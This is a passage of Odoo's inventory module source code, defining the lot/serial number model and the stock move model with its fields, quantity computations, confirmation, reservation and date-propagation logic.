stock_operation_obj._copy_remaining_pack_lot_ids(cr, uid, new_operation, operation.id, context=context)
op = stock_operation_obj.browse(cr, uid, new_operation, context=context)
pack_operation_ids.append(op.id)
if operations:
stock_operation_obj.check_tracking(cr, uid, pack_operation_ids, context=context)
package_id = package_obj.create(cr, uid, {}, context=context)
stock_operation_obj.write(cr, uid, pack_operation_ids, {'result_package_id': package_id}, context=context)
else:
raise UserError(_('Please process some quantities to put in the pack first!'))
return package_id
class stock_production_lot(osv.osv):
_name = 'stock.production.lot'
_inherit = ['mail.thread']
_description = 'Lot/Serial'
_columns = {
'name': fields.char('Serial Number', required=True, help="Unique Serial Number"),
'ref': fields.char('Internal Reference', help="Internal reference number in case it differs from the manufacturer's serial number"),
'product_id': fields.many2one('product.product', 'Product', required=True, domain=[('type', 'in', ['product', 'consu'])]),
'quant_ids': fields.one2many('stock.quant', 'lot_id', 'Quants', readonly=True),
'create_date': fields.datetime('Creation Date'),
}
_defaults = {
'name': lambda x, y, z, c: x.pool.get('ir.sequence').next_by_code(y, z, 'stock.lot.serial'),
'product_id': lambda x, y, z, c: c.get('product_id', False),
}
_sql_constraints = [
('name_ref_uniq', 'unique (name, product_id)', 'The combination of serial number and product must be unique !'),
]
def action_traceability(self, cr, uid, ids, context=None):
""" It traces the information of lots
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param ids: List of IDs selected
@param context: A standard dictionary
@return: A dictionary of values
"""
quant_obj = self.pool.get("stock.quant")
quants = quant_obj.search(cr, uid, [('lot_id', 'in', ids)], context=context)
moves = set()
for quant in quant_obj.browse(cr, uid, quants, context=context):
moves |= {move.id for move in quant.history_ids}
if moves:
return {
'domain': "[('id','in',[" + ','.join(map(str, list(moves))) + "])]",
'name': _('Traceability'),
'view_mode': 'tree,form',
'view_type': 'form',
'context': {'tree_view_ref': 'stock.view_move_tree'},
'res_model': 'stock.move',
'type': 'ir.actions.act_window',
}
return False
# ----------------------------------------------------
# Move
# ----------------------------------------------------
class stock_move(osv.osv):
_name = "stock.move"
_description = "Stock Move"
_order = 'picking_id, sequence, id'
def get_price_unit(self, cr, uid, move, context=None):
""" Returns the unit price to store on the quant """
return move.price_unit or move.product_id.standard_price
def name_get(self, cr, uid, ids, context=None):
res = []
for line in self.browse(cr, uid, ids, context=context):
name = line.location_id.name + ' > ' + line.location_dest_id.name
if line.product_id.code:
name = line.product_id.code + ': ' + name
if line.picking_id.origin:
name = line.picking_id.origin + '/ ' + name
res.append((line.id, name))
return res
def _quantity_normalize(self, cr, uid, ids, name, args, context=None):
uom_obj = self.pool.get('product.uom')
res = {}
for m in self.browse(cr, uid, ids, context=context):
res[m.id] = uom_obj._compute_qty_obj(cr, uid, m.product_uom, m.product_uom_qty, m.product_id.uom_id, context=context)
return res
def _get_remaining_qty(self, cr, uid, ids, field_name, args, context=None):
uom_obj = self.pool.get('product.uom')
res = {}
for move in self.browse(cr, uid, ids, context=context):
qty = move.product_qty
for record in move.linked_move_operation_ids:
qty -= record.qty
# Keeping in product default UoM
res[move.id] = float_round(qty, precision_rounding=move.product_id.uom_id.rounding)
return res
def _get_lot_ids(self, cr, uid, ids, field_name, args, context=None):
res = dict.fromkeys(ids, False)
for move in self.browse(cr, uid, ids, context=context):
if move.state == 'done':
res[move.id] = [q.lot_id.id for q in move.quant_ids if q.lot_id]
else:
res[move.id] = [q.lot_id.id for q in move.reserved_quant_ids if q.lot_id]
return res
def _get_product_availability(self, cr, uid, ids, field_name, args, context=None):
quant_obj = self.pool.get('stock.quant')
res = dict.fromkeys(ids, False)
for move in self.browse(cr, uid, ids, context=context):
if move.state == 'done':
res[move.id] = move.product_qty
else:
sublocation_ids = self.pool.get('stock.location').search(cr, uid, [('id', 'child_of', [move.location_id.id])], context=context)
quant_ids = quant_obj.search(cr, uid, [('location_id', 'in', sublocation_ids), ('product_id', '=', move.product_id.id), ('reservation_id', '=', False)], context=context)
availability = 0
for quant in quant_obj.browse(cr, uid, quant_ids, context=context):
availability += quant.qty
res[move.id] = min(move.product_qty, availability)
return res
def _get_string_qty_information(self, cr, uid, ids, field_name, args, context=None):
uom_obj = self.pool.get('product.uom')
res = dict.fromkeys(ids, '')
precision = self.pool['decimal.precision'].precision_get(cr, uid, 'Product Unit of Measure')
for move in self.browse(cr, uid, ids, context=context):
if move.state in ('draft', 'done', 'cancel') or move.location_id.usage != 'internal':
res[move.id] = '' # 'not applicable' or 'n/a' could work too
continue
total_available = min(move.product_qty, move.reserved_availability + move.availability)
total_available = uom_obj._compute_qty_obj(cr, uid, move.product_id.uom_id, total_available, move.product_uom, round=False, context=context)
total_available = float_round(total_available, precision_digits=precision)
info = str(total_available)
#look in the settings if we need to display the UoM name or not
if self.pool.get('res.users').has_group(cr, uid, 'product.group_uom'):
info += ' ' + move.product_uom.name
if move.reserved_availability:
if move.reserved_availability != total_available:
#some of the available quantity is assigned and some are available but not reserved
reserved_available = uom_obj._compute_qty_obj(cr, uid, move.product_id.uom_id, move.reserved_availability, move.product_uom, round=False, context=context)
reserved_available = float_round(reserved_available, precision_digits=precision)
info += _(' (%s reserved)') % str(reserved_available)
else:
#all available quantity is assigned
info += _(' (reserved)')
res[move.id] = info
return res
def _get_reserved_availability(self, cr, uid, ids, field_name, args, context=None):
res = dict.fromkeys(ids, 0)
for move in self.browse(cr, uid, ids, context=context):
res[move.id] = sum([quant.qty for quant in move.reserved_quant_ids])
return res
def _get_move(self, cr, uid, ids, context=None):
res = set()
for quant in self.browse(cr, uid, ids, context=context):
if quant.reservation_id:
res.add(quant.reservation_id.id)
return list(res)
def _get_move_ids(self, cr, uid, ids, context=None):
res = []
for picking in self.browse(cr, uid, ids, context=context):
res += [x.id for x in picking.move_lines]
return res
def _get_moves_from_prod(self, cr, uid, ids, context=None):
if ids:
return self.pool.get('stock.move').search(cr, uid, [('product_id', 'in', ids)], context=context)
return []
def _set_product_qty(self, cr, uid, id, field, value, arg, context=None):
""" The meaning of product_qty field changed lately and is now a functional field computing the quantity
in the default product UoM. This code has been added to raise an error if a write is made given a value
for `product_qty`, where the same write should set the `product_uom_qty` field instead, in order to
detect errors.
"""
raise UserError(_('The requested operation cannot be processed because of a programming error setting the `product_qty` field instead of the `product_uom_qty`.'))
_columns = {
'sequence': fields.integer('Sequence'),
'name': fields.char('Description', required=True, select=True),
'priority': fields.selection(procurement.PROCUREMENT_PRIORITIES, 'Priority'),
'create_date': fields.datetime('Creation Date', readonly=True, select=True),
'date': fields.datetime('Date', required=True, select=True, help="Move date: scheduled date until move is done, then date of actual move processing", states={'done': [('readonly', True)]}),
'date_expected': fields.datetime('Expected Date', states={'done': [('readonly', True)]}, required=True, select=True, help="Scheduled date for the processing of this move"),
'product_id': fields.many2one('product.product', 'Product', required=True, select=True, domain=[('type', 'in', ['product', 'consu'])], states={'done': [('readonly', True)]}),
'product_qty': fields.function(_quantity_normalize, fnct_inv=_set_product_qty, type='float', digits=0, store={
_name: (lambda self, cr, uid, ids, c={}: ids, ['product_id', 'product_uom', 'product_uom_qty'], 10),
}, string='Quantity',
help='Quantity in the default UoM of the product'),
'product_uom_qty': fields.float('Quantity', digits_compute=dp.get_precision('Product Unit of Measure'),
required=True, states={'done': [('readonly', True)]},
help="This is the quantity of products from an inventory "
"point of view. For moves in the state 'done', this is the "
"quantity of products that were actually moved. For other "
"moves, this is the quantity of product that is planned to "
"be moved. Lowering this quantity does not generate a "
"backorder. Changing this quantity on assigned moves affects "
"the product reservation, and should be done with care."
),
'product_uom': fields.many2one('product.uom', 'Unit of Measure', required=True, states={'done': [('readonly', True)]}),
'product_tmpl_id': fields.related('product_id', 'product_tmpl_id', type='many2one', relation='product.template', string='Product Template'),
'product_packaging': fields.many2one('product.packaging', 'preferred Packaging', help="It specifies attributes of packaging like type, quantity of packaging,etc."),
'location_id': fields.many2one('stock.location', 'Source Location', required=True, select=True, auto_join=True,
states={'done': [('readonly', True)]}, help="Sets a location if you produce at a fixed location. This can be a partner location if you subcontract the manufacturing operations."),
'location_dest_id': fields.many2one('stock.location', 'Destination Location', required=True, states={'done': [('readonly', True)]}, select=True,
auto_join=True, help="Location where the system will stock the finished products."),
'partner_id': fields.many2one('res.partner', 'Destination Address ', states={'done': [('readonly', True)]}, help="Optional address where goods are to be delivered, specifically used for allotment"),
'picking_partner_id': fields.related('picking_id', 'partner_id', type='many2one', relation='res.partner', string='Transfer Destination Address'),
'move_dest_id': fields.many2one('stock.move', 'Destination Move', help="Optional: next stock move when chaining them", select=True, copy=False),
'move_orig_ids': fields.one2many('stock.move', 'move_dest_id', 'Original Move', help="Optional: previous stock move when chaining them", select=True),
'picking_id': fields.many2one('stock.picking', 'Transfer Reference', select=True, states={'done': [('readonly', True)]}),
'note': fields.text('Notes'),
'state': fields.selection([('draft', 'New'),
('cancel', 'Cancelled'),
('waiting', 'Waiting Another Move'),
('confirmed', 'Waiting Availability'),
('assigned', 'Available'),
('done', 'Done'),
], 'Status', readonly=True, select=True, copy=False,
help= "* New: When the stock move is created and not yet confirmed.\n"\
"* Waiting Another Move: This state can be seen when a move is waiting for another one, for example in a chained flow.\n"\
"* Waiting Availability: This state is reached when the procurement resolution is not straight forward. It may need the scheduler to run, a component to me manufactured...\n"\
"* Available: When products are reserved, it is set to \'Available\'.\n"\
"* Done: When the shipment is processed, the state is \'Done\'."),
'partially_available': fields.boolean('Partially Available', readonly=True, help="Checks if the move has some stock reserved", copy=False),
'price_unit': fields.float('Unit Price', help="Technical field used to record the product cost set by the user during a picking confirmation (when costing method used is 'average price' or 'real'). Value given in company currency and in product uom."), # as it's a technical field, we intentionally don't provide the digits attribute
'company_id': fields.many2one('res.company', 'Company', required=True, select=True),
'split_from': fields.many2one('stock.move', string="Move Split From", help="Technical field used to track the origin of a split move, which can be useful in case of debug", copy=False),
'backorder_id': fields.related('picking_id', 'backorder_id', type='many2one', relation="stock.picking", string="Back Order of", select=True),
'origin': fields.char("Source Document"),
'procure_method': fields.selection([('make_to_stock', 'Default: Take From Stock'), ('make_to_order', 'Advanced: Apply Procurement Rules')], 'Supply Method', required=True,
help="""By default, the system will take from the stock in the source location and passively wait for availability. The other possibility allows you to directly create a procurement on the source location (and thus ignore its current stock) to gather products. If we want to chain moves and have this one to wait for the previous, this second option should be chosen."""),
# used for colors in tree views:
'scrapped': fields.related('location_dest_id', 'scrap_location', type='boolean', relation='stock.location', string='Scrapped', readonly=True),
'quant_ids': fields.many2many('stock.quant', 'stock_quant_move_rel', 'move_id', 'quant_id', 'Moved Quants', copy=False),
'reserved_quant_ids': fields.one2many('stock.quant', 'reservation_id', 'Reserved quants'),
'linked_move_operation_ids': fields.one2many('stock.move.operation.link', 'move_id', string='Linked Operations', readonly=True, help='Operations that impact this move for the computation of the remaining quantities'),
'remaining_qty': fields.function(_get_remaining_qty, type='float', string='Remaining Quantity', digits=0,
states={'done': [('readonly', True)]}, help="Remaining Quantity in default UoM according to operations matched with this move"),
'procurement_id': fields.many2one('procurement.order', 'Procurement'),
'group_id': fields.many2one('procurement.group', 'Procurement Group'),
'rule_id': fields.many2one('procurement.rule', 'Procurement Rule', help='The procurement rule that created this stock move'),
'push_rule_id': fields.many2one('stock.location.path', 'Push Rule', help='The push rule that created this stock move'),
'propagate': fields.boolean('Propagate cancel and split', help='If checked, when this move is cancelled, cancel the linked move too'),
'picking_type_id': fields.many2one('stock.picking.type', 'Picking Type'),
'inventory_id': fields.many2one('stock.inventory', 'Inventory'),
'lot_ids': fields.function(_get_lot_ids, type='many2many', relation='stock.production.lot', string='Lots'),
'origin_returned_move_id': fields.many2one('stock.move', 'Origin return move', help='move that created the return move', copy=False),
'returned_move_ids': fields.one2many('stock.move', 'origin_returned_move_id', 'All returned moves', help='Optional: all returned moves created from this move'),
'reserved_availability': fields.function(_get_reserved_availability, type='float', string='Quantity Reserved', readonly=True, help='Quantity that has already been reserved for this move'),
'availability': fields.function(_get_product_availability, type='float', string='Forecasted Quantity', readonly=True, help='Quantity in stock that can still be reserved for this move'),
'string_availability_info': fields.function(_get_string_qty_information, type='text', string='Availability', readonly=True, help='Show various information on stock availability for this move'),
'restrict_lot_id': fields.many2one('stock.production.lot', 'Lot', help="Technical field used to depict a restriction on the lot of quants to consider when marking this move as 'done'"),
'restrict_partner_id': fields.many2one('res.partner', 'Owner ', help="Technical field used to depict a restriction on the ownership of quants to consider when marking this move as 'done'"),
'route_ids': fields.many2many('stock.location.route', 'stock_location_route_move', 'move_id', 'route_id', 'Destination route', help="Preferred route to be followed by the procurement order"),
'warehouse_id': fields.many2one('stock.warehouse', 'Warehouse', help="Technical field depicting the warehouse to consider for the route selection on the next procurement (if any)."),
}
def _default_destination_address(self, cr, uid, context=None):
return False
def _default_group_id(self, cr, uid, context=None):
context = context or {}
if context.get('default_picking_id', False):
picking = self.pool.get('stock.picking').browse(cr, uid, context['default_picking_id'], context=context)
return picking.group_id.id
return False
_defaults = {
'partner_id': _default_destination_address,
'state': 'draft',
'priority': '1',
'product_uom_qty': 1.0,
'sequence': 10,
'scrapped': False,
'date': fields.datetime.now,
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.move', context=c),
'date_expected': fields.datetime.now,
'procure_method': 'make_to_stock',
'propagate': True,
'partially_available': False,
'group_id': _default_group_id,
}
def _check_uom(self, cr, uid, ids, context=None):
for move in self.browse(cr, uid, ids, context=context):
if move.product_id.uom_id.category_id.id != move.product_uom.category_id.id:
return False
return True
_constraints = [
(_check_uom,
'You try to move a product using a UoM that is not compatible with the UoM of the product moved. Please use an UoM in the same UoM category.',
['product_uom']),
]
def init(self, cr):
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = %s', ('stock_move_product_location_index',))
if not cr.fetchone():
cr.execute('CREATE INDEX stock_move_product_location_index ON stock_move (product_id, location_id, location_dest_id, company_id, state)')
@api.cr_uid_ids_context
def do_unreserve(self, cr, uid, move_ids, context=None):
quant_obj = self.pool.get("stock.quant")
for move in self.browse(cr, uid, move_ids, context=context):
if move.state in ('done', 'cancel'):
raise UserError(_('Cannot unreserve a done move'))
quant_obj.quants_unreserve(cr, uid, move, context=context)
if not context.get('no_state_change'):
if self.find_move_ancestors(cr, uid, move, context=context):
self.write(cr, uid, [move.id], {'state': 'waiting'}, context=context)
else:
self.write(cr, uid, [move.id], {'state': 'confirmed'}, context=context)
def _prepare_procurement_from_move(self, cr, uid, move, context=None):
origin = (move.group_id and (move.group_id.name + ":") or "") + (move.rule_id and move.rule_id.name or move.origin or move.picking_id.name or "/")
group_id = move.group_id and move.group_id.id or False
if move.rule_id:
if move.rule_id.group_propagation_option == 'fixed' and move.rule_id.group_id:
group_id = move.rule_id.group_id.id
elif move.rule_id.group_propagation_option == 'none':
group_id = False
return {
'name': move.rule_id and move.rule_id.name or "/",
'origin': origin,
'company_id': move.company_id and move.company_id.id or False,
'date_planned': move.date,
'product_id': move.product_id.id,
'product_qty': move.product_uom_qty,
'product_uom': move.product_uom.id,
'location_id': move.location_id.id,
'move_dest_id': move.id,
'group_id': group_id,
'route_ids': [(4, x.id) for x in move.route_ids],
'warehouse_id': move.warehouse_id.id or (move.picking_type_id and move.picking_type_id.warehouse_id.id or False),
'priority': move.priority,
}
def _push_apply(self, cr, uid, moves, context=None):
push_obj = self.pool.get("stock.location.path")
for move in moves:
#1) if the move is already chained, there is no need to check push rules
#2) if the move is a returned move, we don't want to check push rules, as returning a returned move is the only decent way
# to receive goods without triggering the push rules again (which would duplicate chained operations)
if not move.move_dest_id:
domain = [('location_from_id', '=', move.location_dest_id.id)]
#priority goes to the route defined on the product and product category
route_ids = [x.id for x in move.product_id.route_ids + move.product_id.categ_id.total_route_ids]
rules = push_obj.search(cr, uid, domain + [('route_id', 'in', route_ids)], order='route_sequence, sequence', context=context)
if not rules:
#then we search on the warehouse if a rule can apply
wh_route_ids = []
if move.warehouse_id:
wh_route_ids = [x.id for x in move.warehouse_id.route_ids]
elif move.picking_id.picking_type_id.warehouse_id:
wh_route_ids = [x.id for x in move.picking_id.picking_type_id.warehouse_id.route_ids]
if wh_route_ids:
rules = push_obj.search(cr, uid, domain + [('route_id', 'in', wh_route_ids)], order='route_sequence, sequence', context=context)
if not rules:
#if no specialized push rule has been found yet, we try to find a general one (without route)
rules = push_obj.search(cr, uid, domain + [('route_id', '=', False)], order='sequence', context=context)
if rules:
rule = push_obj.browse(cr, uid, rules[0], context=context)
# Make sure it is not returning the return
if (not move.origin_returned_move_id or move.origin_returned_move_id.location_dest_id.id != rule.location_dest_id.id):
push_obj._apply(cr, uid, rule, move, context=context)
return True
def _create_procurement(self, cr, uid, move, context=None):
""" This will create a procurement order """
return self.pool.get("procurement.order").create(cr, uid, self._prepare_procurement_from_move(cr, uid, move, context=context), context=context)
def _create_procurements(self, cr, uid, moves, context=None):
res = []
for move in moves:
res.append(self._create_procurement(cr, uid, move, context=context))
# Run procurements immediately when generated from multiple moves
self.pool['procurement.order'].run(cr, uid, res, context=context)
return res
def create(self, cr, uid, vals, context=None):
if context is None:
context = {}
picking_obj = self.pool['stock.picking']
track = not context.get('mail_notrack') and vals.get('picking_id')
if track:
picking = picking_obj.browse(cr, uid, vals['picking_id'], context=context)
initial_values = {picking.id: {'state': picking.state}}
res = super(stock_move, self).create(cr, uid, vals, context=context)
if track:
picking_obj.message_track(cr, uid, [vals['picking_id']], picking_obj.fields_get(cr, uid, ['state'], context=context), initial_values, context=context)
return res
def write(self, cr, uid, ids, vals, context=None):
if context is None:
context = {}
if isinstance(ids, (int, long)):
ids = [ids]
picking_obj = self.pool['stock.picking']
# Check that we do not modify a stock.move which is done
frozen_fields = set(['product_qty', 'product_uom', 'location_id', 'location_dest_id', 'product_id'])
moves = self.browse(cr, uid, ids, context=context)
for move in moves:
if move.state == 'done':
if frozen_fields.intersection(vals):
raise UserError(_('Quantities, Units of Measure, Products and Locations cannot be modified on stock moves that have already been processed (except by the Administrator).'))
propagated_changes_dict = {}
#propagation of quantity change
if vals.get('product_uom_qty'):
propagated_changes_dict['product_uom_qty'] = vals['product_uom_qty']
if vals.get('product_uom_id'):
propagated_changes_dict['product_uom_id'] = vals['product_uom_id']
if vals.get('product_uos_qty'):
propagated_changes_dict['product_uos_qty'] = vals['product_uos_qty']
if vals.get('product_uos_id'):
propagated_changes_dict['product_uos_id'] = vals['product_uos_id']
#propagation of expected date:
propagated_date_field = False
if vals.get('date_expected'):
#propagate any manual change of the expected date
propagated_date_field = 'date_expected'
elif (vals.get('state', '') == 'done' and vals.get('date')):
#propagate also any delta observed when setting the move as done
propagated_date_field = 'date'
if not context.get('do_not_propagate', False) and (propagated_date_field or propagated_changes_dict):
#any propagation is (maybe) needed
for move in self.browse(cr, uid, ids, context=context):
if move.move_dest_id and move.propagate:
if 'date_expected' in propagated_changes_dict:
propagated_changes_dict.pop('date_expected')
if propagated_date_field:
current_date = datetime.strptime(move.date_expected, DEFAULT_SERVER_DATETIME_FORMAT)
new_date = datetime.strptime(vals.get(propagated_date_field), DEFAULT_SERVER_DATETIME_FORMAT)
delta = new_date - current_date
if abs(delta.days) >= move.company_id.propagation_minimum_delta:
old_move_date = datetime.strptime(move.move_dest_id.date_expected, DEFAULT_SERVER_DATETIME_FORMAT)
new_move_date = (old_move_date + relativedelta.relativedelta(days=delta.days or 0)).strftime(DEFAULT_SERVER_DATETIME_FORMAT)
propagated_changes_dict['date_expected'] = new_move_date
#For pushed moves as well as for pulled moves, propagate by recursive call of write().
#Note that, for pulled moves we intentionally don't propagate on the procurement.
if propagated_changes_dict:
self.write(cr, uid, [move.move_dest_id.id], propagated_changes_dict, context=context)
track_pickings = not context.get('mail_notrack') and any(field in vals for field in ['state', 'picking_id', 'partially_available'])
if track_pickings:
to_track_picking_ids = set([move.picking_id.id for move in moves if move.picking_id])
if vals.get('picking_id'):
to_track_picking_ids.add(vals['picking_id'])
to_track_picking_ids = list(to_track_picking_ids)
pickings = picking_obj.browse(cr, uid, to_track_picking_ids, context=context)
initial_values = dict((picking.id, {'state': picking.state}) for picking in pickings)
res = super(stock_move, self).write(cr, uid, ids, vals, context=context)
if track_pickings:
picking_obj.message_track(cr, uid, to_track_picking_ids, picking_obj.fields_get(cr, uid, ['state'], context=context), initial_values, context=context)
return res
def onchange_quantity(self, cr, uid, ids, product_id, product_qty, product_uom):
""" On change of product quantity finds UoM
@param product_id: Product id
@param product_qty: Changed Quantity of product
@param product_uom: Unit of measure of product
@return: Dictionary of values
"""
warning = {}
result = {}
if (not product_id) or (product_qty <= 0.0):
result['product_qty'] = 0.0
return {'value': result}
product_obj = self.pool.get('product.product')
# Warn if the quantity was decreased
if ids:
for move in self.read(cr, uid, ids, ['product_qty']):
if product_qty < move['product_qty']:
warning.update({
'title': _('Information'),
'message': _("By changing this quantity here, you accept the "
"new quantity as complete: Odoo will not "
"automatically generate a back order.")})
break
return {'warning': warning}
def onchange_product_id(self, cr, uid, ids, prod_id=False, loc_id=False, loc_dest_id=False, partner_id=False):
""" On change of product id, if finds UoM, quantity
@param prod_id: Changed Product id
@param loc_id: Source location id
@param loc_dest_id: Destination location id
@param partner_id: Address id of partner
@return: Dictionary of values
"""
if not prod_id:
return {'domain': {'product_uom': []}}
user = self.pool.get('res.users').browse(cr, uid, uid)
lang = user and user.lang or False
if partner_id:
addr_rec = self.pool.get('res.partner').browse(cr, uid, partner_id)
if addr_rec:
lang = addr_rec and addr_rec.lang or False
ctx = {'lang': lang}
product = self.pool.get('product.product').browse(cr, uid, [prod_id], context=ctx)[0]
result = {
'name': product.partner_ref,
'product_uom': product.uom_id.id,
'product_uom_qty': 1.00,
}
if loc_id:
result['location_id'] = loc_id
if loc_dest_id:
result['location_dest_id'] = loc_dest_id
res = {'value': result,
'domain': {'product_uom': [('category_id', '=', product.uom_id.category_id.id)]}
}
return res
def _prepare_picking_assign(self, cr, uid, move, context=None):
""" Prepares a new picking for this move as it could not be assigned to
another picking. This method is designed to be inherited.
"""
values = {
'origin': move.origin,
'company_id': move.company_id and move.company_id.id or False,
'move_type': move.group_id and move.group_id.move_type or 'direct',
'partner_id': move.partner_id.id or False,
'picking_type_id': move.picking_type_id and move.picking_type_id.id or False,
'location_id': move.location_id.id,
'location_dest_id': move.location_dest_id.id,
}
return values
@api.cr_uid_ids_context
def _picking_assign(self, cr, uid, move_ids, context=None):
"""Try to assign the moves to an existing picking
that has not been reserved yet and has the same
procurement group, locations and picking type (moves should already have them identical)
Otherwise, create a new picking to assign them to.
"""
move = self.browse(cr, uid, move_ids, context=context)[0]
pick_obj = self.pool.get("stock.picking")
picks = pick_obj.search(cr, uid, [
('group_id', '=', move.group_id.id),
('location_id', '=', move.location_id.id),
('location_dest_id', '=', move.location_dest_id.id),
('picking_type_id', '=', move.picking_type_id.id),
('printed', '=', False),
('state', 'in', ['draft', 'confirmed', 'waiting', 'partially_available', 'assigned'])], limit=1, context=context)
if picks:
pick = picks[0]
else:
values = self._prepare_picking_assign(cr, uid, move, context=context)
pick = pick_obj.create(cr, uid, values, context=context)
return self.write(cr, uid, move_ids, {'picking_id': pick}, context=context)
def onchange_date(self, cr, uid, ids, date, date_expected, context=None):
""" On change of Scheduled Date gives a Move date.
@param date_expected: Scheduled Date
@param date: Move Date
@return: Move Date
"""
if not date_expected:
date_expected = time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)
return {'value': {'date': date_expected}}
def attribute_price(self, cr, uid, move, context=None):
"""
Attribute price to move, important in inter-company moves or receipts with only one partner
"""
if not move.price_unit:
price = move.product_id.standard_price
self.write(cr, uid, [move.id], {'price_unit': price})
def action_confirm(self, cr, uid, ids, context=None):
""" Confirms stock move or put it in waiting if it's linked to another move.
@return: List of ids.
"""
if not context:
context = {}
if isinstance(ids, (int, long)):
ids = [ids]
states = {
'confirmed': [],
'waiting': []
}
to_assign = {}
for move in self.browse(cr, uid, ids, context=context):
self.attribute_price(cr, uid, move, context=context)
state = 'confirmed'
#if the move is preceeded, then it's waiting (if preceeding move is done, then action_assign has been called already and its state is already available)
if move.move_orig_ids:
state = 'waiting'
#if the move is split and some of the ancestor was preceeded, then it's waiting as well
elif move.split_from:
move2 = move.split_from
while move2 and state != 'waiting':
if move2.move_orig_ids:
state = 'waiting'
move2 = move2.split_from
states[state].append(move.id)
if not move.picking_id and move.picking_type_id:
key = (move.group_id.id, move.location_id.id, move.location_dest_id.id)
if key not in to_assign:
to_assign[key] = []
to_assign[key].append(move.id)
moves = [move for move in self.browse(cr, uid, states['confirmed'], context=context) if move.procure_method == 'make_to_order']
self._create_procurements(cr, uid, moves, context=context)
for move in moves:
states['waiting'].append(move.id)
states['confirmed'].remove(move.id)
for state, write_ids in states.items():
if len(write_ids):
self.write(cr, uid, write_ids, {'state': state}, context=context)
#assign picking in batch for all confirmed move that share the same details
for key, move_ids in to_assign.items():
self._picking_assign(cr, uid, move_ids, context=context)
moves = self.browse(cr, uid, ids, context=context)
self._push_apply(cr, uid, moves, context=context)
return ids
def force_assign(self, cr, uid, ids, context=None):
""" Changes the state to assigned.
@return: True
"""
res = self.write(cr, uid, ids, {'state': 'assigned'}, context=context)
self.check_recompute_pack_op(cr, uid, ids, context=context)
return res
def check_tracking(self, cr, uid, move, ops, context=None):
""" Checks if serial number is assigned to stock move or not and raise an error if it had to.
"""
if move.picking_id and (move.picking_id.picking_type_id.use_existing_lots or move.picking_id.picking_type_id.use_create_lots) and \
move.product_id.tracking != 'none':
if not (move.restrict_lot_id or (ops and (ops.product_id and ops.pack_lot_ids)) or (ops and not ops.product_id)):
raise UserError(_('You need to provide a Lot/Serial Number for product %s') % move.product_id.name)
def check_recompute_pack_op(self, cr, uid, ids, context=None):
pickings = list(set([x.picking_id for x in self.browse(cr, uid, ids, context=context) if x.picking_id]))
pickings_partial = []
pickings_write = []
pick_obj = self.pool['stock.picking']
for pick in pickings:
if pick.state in ('waiting', 'confirmed'): #In case of 'all at once' delivery method it should not prepare pack operations
continue
# Check if someone was treating the picking already
if not any([x.qty_done > 0 for x in pick.pack_operation_ids]):
pickings_partial.append(pick.id)
else:
pickings_write.append(pick.id)
if pickings_partial:
pick_obj.do_prepare_partial(cr, uid, pickings_partial, context=context)
if pickings_write:
pick_obj.write(cr, uid, pickings_write, {'recompute_pack_op': True}, context=context)
def action_assign(self, cr, uid, ids, no_prepare=False, context=None):
""" Checks the product type and accordingly writes the state.
"""
context = context or {}
quant_obj = self.pool.get("stock.quant")
uom_obj = self.pool['product.uom']
to_assign_moves = set()
main_domain = {}
todo_moves = []
operations = set()
ancestors_list = {}
self.do_unreserve(cr, uid, [x.id for x in self.browse(cr, uid, ids, context=context) if x.reserved_quant_ids and x.state in ['confirmed', 'waiting', 'assigned']], context=context)
for move in self.browse(cr, uid, ids, context=context):
if move.state not in ('confirmed', 'waiting', 'assigned'):
continue
if move.location_id.usage in ('supplier', 'inventory', 'production'):
to_assign_moves.add(move.id)
#in case the move is returned, we want to try to find quants before forcing the assignment
if not move.origin_returned_move_id:
continue
if move.product_id.type == 'consu':
to_assign_moves.add(move.id)
continue
else:
todo_moves.append(move)
#we always search for yet unassigned quants
main_domain[move.id] = [('reservation_id', '=', False), ('qty', '>', 0)]
#if the move is preceeded, restrict the choice of quants in the ones moved previously in original move
ancestors = self.find_move_ancestors(cr, uid, move, context=context)
ancestors_list[move.id] = True if ancestors else False
if move.state == 'waiting' and not ancestors:
#if the waiting move hasn't yet any ancestor (PO/MO not confirmed yet), don't find any quant available in stock
main_domain[move.id] += [('id', '=', False)]
elif ancestors:
main_domain[move.id] += [('history_ids', 'in', ancestors)]
#if the move is returned from another, restrict the choice of quants to the ones that follow the returned move
if move.origin_returned_move_id:
main_domain[move.id] += [('history_ids', 'in', move.origin_returned_move_id.id)]
for link in move.linked_move_operation_ids:
operations.add(link.operation_id)
# Check all ops and sort them: we want to process first the packages, then operations with lot then the rest
operations = list(operations)
operations.sort(key=lambda x: ((x.package_id and not x.product_id) and -4 or 0) + (x.package_id and -2 or 0) + (x.pack_lot_ids and -1 or 0))
for ops in operations:
#first try to find quants based on specific domains given by linked operations for the case where we want to rereserve according to existing pack operations
if not (ops.product_id and ops.pack_lot_ids):
for record in ops.linked_move_operation_ids:
move = record.move_id
if move.id in main_domain:
qty = record.qty
domain = main_domain[move.id]
if qty:
quants = quant_obj.quants_get_preferred_domain(cr, uid, qty, move, ops=ops, domain=domain, preferred_domain_list=[], context=context)
quant_obj.quants_reserve(cr, uid, quants, move, record, context=context)
else:
lot_qty = {}
rounding = ops.product_id.uom_id.rounding
for pack_lot in ops.pack_lot_ids:
lot_qty[pack_lot.lot_id.id] = uom_obj._compute_qty(cr, uid, ops.product_uom_id.id, pack_lot.qty, ops.product_id.uom_id.id)
for record in ops.linked_move_operation_ids.filtered(lambda x: x.move_id.id in main_domain):
move_qty = record.qty
move = record.move_id
domain = main_domain[move.id]
for lot in lot_qty:
if float_compare(lot_qty[lot], 0, precision_rounding=rounding) > 0 and float_compare(move_qty, 0, precision_rounding=rounding) > 0:
qty = min(lot_qty[lot], move_qty)
quants = quant_obj.quants_get_preferred_domain(cr, uid, qty, move, ops=ops, lot_id=lot, domain=domain, preferred_domain_list=[], context=context)
quant_obj.quants_reserve(cr, uid, quants, move, record, context=context)
lot_qty[lot] -= qty
move_qty -= qty
# Sort moves to reserve first the ones with ancestors, in case the same product is listed in
# different stock moves.
todo_moves.sort(key=lambda x: -1 if ancestors_list.get(x.id) else 0)
for move in todo_moves:
#then if the move isn't totally assigned, try to find quants without any specific domain
if (move.state != 'assigned') and not context.get("reserve_only_ops"):
qty_already_assigned = move.reserved_availability
qty = move.product_qty - qty_already_assigned
quants = quant_obj.quants_get_preferred_domain(cr, uid, qty, move, domain=main_domain[move.id], preferred_domain_list=[], context=context)
